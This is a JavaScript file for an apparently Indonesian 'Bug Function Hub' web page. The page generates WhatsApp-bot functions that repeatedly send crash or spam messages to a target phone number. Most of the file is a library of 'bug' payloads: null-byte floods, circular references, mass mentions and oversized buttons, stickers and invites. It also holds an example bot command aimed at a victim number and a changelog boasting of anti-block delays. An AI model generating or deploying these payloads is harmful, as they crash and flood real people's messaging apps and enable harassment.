// PRELOADER
window.addEventListener('load', () => {
    setTimeout(() => {
        const preloader = document.getElementById('preloader');
        preloader.classList.add('hide-preloader');
    }, 1500);
});

// BACKGROUND ANIMASI (Particles)
const canvas = document.getElementById('bgCanvas');
if (canvas) {
    const ctx = canvas.getContext('2d');
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;

    let particles = [];
    for (let i = 0; i < 100; i++) {
        particles.push({
            x: Math.random() * canvas.width,
            y: Math.random() * canvas.height,
            radius: Math.random() * 3 + 1,
            speedX: (Math.random() - 0.5) * 0.8,
            speedY: (Math.random() - 0.5) * 0.8,
            opacity: Math.random() * 0.5
        });
    }

    function animateBg() {
        ctx.clearRect(0, 0, canvas.width, canvas.height);
        for (let p of particles) {
            ctx.beginPath();
            ctx.arc(p.x, p.y, p.radius, 0, Math.PI * 2);
            ctx.fillStyle = `rgba(37, 211, 102, ${p.opacity})`;
            ctx.fill();
            p.x += p.speedX;
            p.y += p.speedY;
            if (p.x < 0) p.x = canvas.width;
            if (p.x > canvas.width) p.x = 0;
            if (p.y < 0) p.y = canvas.height;
            if (p.y > canvas.height) p.y = 0;
        }
        requestAnimationFrame(animateBg);
    }
    animateBg();

    window.addEventListener('resize', () => {
        canvas.width = window.innerWidth;
        canvas.height = window.innerHeight;
    });
}

// STATS ANGKA ANIMASI
function animateNumber(element, target) {
    let current = 0;
    const increment = target / 30;
    const interval = setInterval(() => {
        current += increment;
        if (current >= target) {
            element.innerText = target;
            clearInterval(interval);
        } else {
            element.innerText = Math.floor(current);
        }
    }, 30);
}

animateNumber(document.getElementById('statBugs'), 20);
animateNumber(document.getElementById('statToday'), 15);
animateNumber(document.getElementById('statGacor'), 99);

// SLIDER VALUE DISPLAY
const loopSlider = document.getElementById('loop');
const delaySlider = document.getElementById('delay');
const loopValue = document.getElementById('loopValue');
const delayValue = document.getElementById('delayValue');

loopSlider.addEventListener('input', () => loopValue.innerText = loopSlider.value);
delaySlider.addEventListener('input', () => delayValue.innerText = delaySlider.value);

// GENERATE FUNCTION
document.getElementById('generateBtn').addEventListener('click', generateBug);
document.getElementById('copyBtn').addEventListener('click', copyCode);
document.getElementById('checkBtn').addEventListener('click', checkNumber);

function generateBug() {
    const bugType = document.getElementById('bugType').value;
    const loop = loopSlider.value;
    const delay = delaySlider.value;
    
    const functionName = `bug_${bugType}_${Date.now()}`;
    
    let payloadCode = getPayloadByType(bugType);
    
    const fullCode = `// ========== BUG: ${bugType.toUpperCase()} ==========
// Loop: ${loop}x | Delay: ${delay}ms
// Generated by Bug Function Hub - Owner Kyy

async function ${functionName}(sock, target) {
    if (!sock || !sock.user) return;
    
    console.log(\`🔥 Sending ${bugType} bug to \${target}\`);
    
    for(let i = 0; i < ${loop}; i++) {
        try {
            ${payloadCode}
            await new Promise(r => setTimeout(r, ${delay}));
        } catch(e) {
            console.log(\`Error: \${e.message}\`);
        }
    }
    
    console.log(\`✅ Bug ${bugType} sent to \${target}\`);
}

module.exports = { ${functionName} };`;
    
    document.getElementById('outputCode').innerText = fullCode;
    
    const exampleCmd = `// Contoh command di bot WhatsApp
case '${bugType}': {
    if (!q) return reply(\`Example: .${bugType} 628xxxx\`);
    let target = q.replace(/[^0-9]/g, '') + '@s.whatsapp.net';
    reply(\`🔥 Sending ${bugType} bug...\`);
    await ${functionName}(sock, target);
    reply(\`✅ Bug sent to \${target}\`);
}
break;`;
    
    document.getElementById('exampleCommand').innerText = exampleCmd;
}

function getPayloadByType(type) {
    const payloads = {
        nuclear: `const circular = { self: null };
        circular.self = circular;
        const payload = {
            viewOnceMessage: {
                message: {
                    interactiveMessage: {
                        header: { title: "\\u0000".repeat(50000) },
                        body: { text: "💀".repeat(30000) },
                        nativeFlowMessage: {
                            messageParamsJson: JSON.stringify({ data: "\\u0000".repeat(100000), circular: circular })
                        },
                        contextInfo: { mentionedJid: Array(30000).fill(target) }
                    }
                }
            }
        };
        await sock.relayMessage(target, payload);`,
        
        status: `for(let i=0;i<5;i++) {
            const msg = generateWAMessageFromContent(target, {
                viewOnceMessage: {
                    message: {
                        imageMessage: {
                            url: \`https://mmg.whatsapp.net/crash_\${Date.now()}.enc\`,
                            caption: "🔥".repeat(30000),
                            contextInfo: { mentionedJid: Array(20000).fill(target) }
                        }
                    }
                }
            }, {});
            await sock.relayMessage("status@broadcast", msg.message, { statusJidList: [target] });
        }`,
        
        payment: `await sock.relayMessage(target, {
            interactiveMessage: {
                body: { text: "PAYMENT".repeat(2000) },
                nativeFlowMessage: {
                    buttons: [
                        { name: "payment_method", buttonParamsJson: "{}" },
                        { name: "payment_status", buttonParamsJson: "{}" }
                    ]
                },
                contextInfo: {
                    quotedMessage: {
                        paymentInviteMessage: {
                            amount1000: "999999999999",
                            inviteMessage: "SCAM".repeat(5000)
                        }
                    }
                }
            }
        });`,
        
        circular: `const circular = {};
        circular.self = circular;
        await sock.relayMessage(target, {
            extendedTextMessage: {
                text: "\\u0000".repeat(50000),
                contextInfo: { quotedMessage: circular, mentionedJid: Array(20000).fill(target) }
            }
        });`,
        
        combo: `const payloads = [/* nuclear, status, payment, circular */];
        await Promise.all(payloads.map(p => p()));`,
        
        sticker: `const msg = generateWAMessageFromContent(target, {
            viewOnceMessage: {
                message: {
                    stickerPackMessage: {
                        name: "💀".repeat(20000),
                        stickers: Array(20).fill({ fileName: "crash.webp", isAnimated: true })
                    }
                }
            }
        }, {});
        await sock.relayMessage(target, msg.message);`,
        
        newsletter: `await sock.relayMessage(target, {
            newsletterAdminInviteMessage: {
                newsletterName: "SPAM".repeat(10000),
                inviteExpiration: Date.now() + 999999999
            }
        });`,
        
        group: `await sock.relayMessage(target, {
            groupInviteMessage: {
                groupName: "CRASH".repeat(10000),
                inviteCode: crypto.randomBytes(32).toString('hex')
            }
        });`,
        
        location: `await sock.relayMessage(target, {
            locationMessage: {
                degreesLatitude: 999.999,
                degreesLongitude: -999.999,
                name: "💀".repeat(20000)
            }
        });`,
        
        audio: `const msg = generateWAMessageFromContent(target, {
            ephemeralMessage: {
                message: {
                    audioMessage: {
                        url: \`https://mmg.whatsapp.net/audio_\${Date.now()}.enc\`,
                        seconds: 999999,
                        contextInfo: { mentionedJid: Array(20000).fill(target) }
                    }
                }
            }
        }, {});
        await sock.relayMessage("status@broadcast", msg.message);`,
        
        call: `await sock.relayMessage(target, {
            interactiveMessage: {
                nativeFlowMessage: {
                    buttons: Array(50).fill({
                        name: "call_permission_request",
                        buttonParamsJson: "{}"
                    })
                }
            }
        });`,
        
        button: `await sock.relayMessage(target, {
            interactiveMessage: {
                nativeFlowMessage: {
                    buttons: Array(100).fill({
                        name: "single_select",
                        buttonParamsJson: JSON.stringify({ title: "SPAM".repeat(1000) })
                    })
                }
            }
        });`,
        
        reaction: `for(let i=0;i<50;i++) {
            await sock.sendMessage(target, { react: { text: "💀", key: m.key } });
        }`,
        
        poll: `await sock.sendMessage(target, {
            poll: {
                name: "SPAM".repeat(1000),
                values: ["YES", "NO"],
                selectableCount: 1
            }
        });`,
        
        template: `await sock.sendMessage(target, {
            templateButtons: {
                text: "💀".repeat(5000),
                buttons: Array(20).fill({ buttonId: "id", buttonText: { displayText: "CRASH" } })
            }
        });`,
        
        blank: `const msg = generateWAMessageFromContent(target, {
            viewOnceMessage: {
                message: {
                    imageMessage: {
                        url: "https://mmg.whatsapp.net/blank.enc",
                        caption: "\\u0000".repeat(50000),
                        contextInfo: { mentionedJid: Array(20000).fill(target) }
                    }
                }
            }
        }, {});
        await sock.relayMessage(target, msg.message);`,
        
        infinite: `const infinite = {};
        infinite.self = infinite;
        infinite.quote = infinite;
        await sock.relayMessage(target, {
            extendedTextMessage: {
                text: "\\u0000".repeat(50000),
                contextInfo: { quotedMessage: infinite }
            }
        });`
    };
    
    return payloads[type] || payloads.nuclear;
}

function copyCode() {
    const code = document.getElementById('outputCode').innerText;
    navigator.clipboard.writeText(code).then(() => {
        alert('✅ Function berhasil dicopy!');
    });
}

// CHECK NUMBER (simulasi)
function checkNumber() {
    const number = document.getElementById('checkNumber').value.trim();
    const resultDiv = document.getElementById('checkResult');
    
    if (!number) {
        resultDiv.innerHTML = '❌ Masukkan nomor terlebih dahulu';
        resultDiv.className = 'check-result result-invalid';
        return;
    }
    
    resultDiv.innerHTML = '⏳ Mengecek nomor...';
    
    setTimeout(() => {
        const isValid = /^62[0-9]{9,13}$/.test(number);
        if (isValid) {
            resultDiv.innerHTML = `✅ ${number} valid! Nomor terdaftar di WhatsApp`;
            resultDiv.className = 'check-result result-valid';
        } else {
            resultDiv.innerHTML = `❌ ${number} tidak valid! Pastikan format 628xxxxxxxxxx`;
            resultDiv.className = 'check-result result-invalid';
        }
    }, 800);
}

// FAKE UPDATE DATA (changelog)
function loadUpdateData() {
    const updateInfo = document.getElementById('updateInfo');
    const changelogDiv = document.getElementById('changelog');
    const archiveDiv = document.getElementById('archive');
    
    updateInfo.innerHTML = `
        <p>📅 <strong>Tanggal:</strong> 23 April 2025</p>
        <p>🔢 <strong>Versi:</strong> v2.5.0</p>
        <p>🐞 <strong>Total Bug Types:</strong> 20+</p>
        <p>⚡ <strong>Status:</strong> <span style="color:#25D366">● Update tersedia</span></p>
    `;
    
    changelogDiv.innerHTML = `
        <div class="changelog-item">
            <div class="changelog-date">23 April 2025</div>
            <div>✨ Menambahkan 5 jenis bug baru: Audio Wave, Call Permission, Reaction Mass, Poll Spam, Template Button</div>
        </div>
        <div class="changelog-item">
            <div class="changelog-date">22 April 2025</div>
            <div>🔥 Upgrade bug COMBO (eksekusi 8 bug sekaligus)</div>
        </div>
        <div class="changelog-item">
            <div class="changelog-date">21 April 2025</div>
            <div>🐛 Fix bug status broadcast, tambah random delay anti blokir</div>
        </div>
    `;
    
    archiveDiv.innerHTML = `
        <div class="archive-item">
            <div class="changelog-date">20 April 2025 - v2.4.0</div>
            <div>Menambahkan fitur check nomor WhatsApp</div>
        </div>
        <div class="archive-item">
            <div class="changelog-date">19 April 2025 - v2.3.0</div>
            <div>Auto update function via GitHub, 15 bug types</div>
        </div>
        <div class="archive-item">
            <div class="changelog-date">18 April 2025 - v2.2.0</div>
            <div>Animasi dashboard, preload, particle background</div>
        </div>
    `;
}

loadUpdateData();

// UPDATE BADGE
document.getElementById('updateBadge').innerHTML = '📅 Update: 23 April 2025 | v2.5.0';
document.getElementById('functionVersion').innerText = 'v2.5.0';
